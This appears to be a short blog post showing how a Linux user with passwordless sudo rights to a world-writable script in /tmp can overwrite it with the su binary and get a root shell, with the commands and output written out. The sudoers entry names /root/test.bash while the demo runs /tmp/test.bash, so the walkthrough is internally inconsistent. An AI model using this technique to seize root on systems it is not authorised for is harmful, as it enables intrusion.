Monday 24 July 2017

A dirty privilege escalation trick


A while ago a colleague of mine showed me a quick and dirty privilege escalation trick exploiting which a user could grant itself root access to a machine.

I felt somewhat inclined to share the trick!

Here is the scenario:

I have a user named sahil on a linux machine and has been granted sudo access to a script /tmp/test.bash. the script is just a text file.

Here's the /etc/sudoers entry for the user.

[root@still ~]# grep sahil /etc/sudoers
sahil   ALL=(root)      NOPASSWD: /root/test.bash
[root@still ~]#

If I login as the user and check it's rights via sudo -l I get the expected result.

[sahil@still ~]$ sudo -l
Matching Defaults entries for sahil on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

 User sahil may run the following commands on this host:
    (root) NOPASSWD: /root/test.bash


So without any additional access when I try to switch to root I can't as shown below:

[sahil@still ~]$ sudo su
[sudo] password for sahil:
Sorry, user sahil is not allowed to execute '/bin/su' as root on still.
[sahil@still ~]$

But I can run the script.

[sahil@still ~]$ sudo /tmp/test.bash
This is a test script
[sahil@still ~]$


The script is in /tmp which is accessible to every user and the script has permissions of 777 set which is never a good thing. Here's an example why.

Now as the user sahil I'll copy the su binary as the script name in /tmp.

[sahil@still ~]$ which su
/bin/su
[sahil@still ~]$ cp /bin/su /tmp/test.bash

Now when I run the script:

[sahil@still ~]$ sudo /tmp/test.bash
[root@still sahil]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@still sahil]#

The user sahil waa able to successfully switch to root user!
-
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Using capture groups in grep in Linux

Introduction Let me start by saying that this article isn't about capture groups in grep per se. What we are going to do here with gr...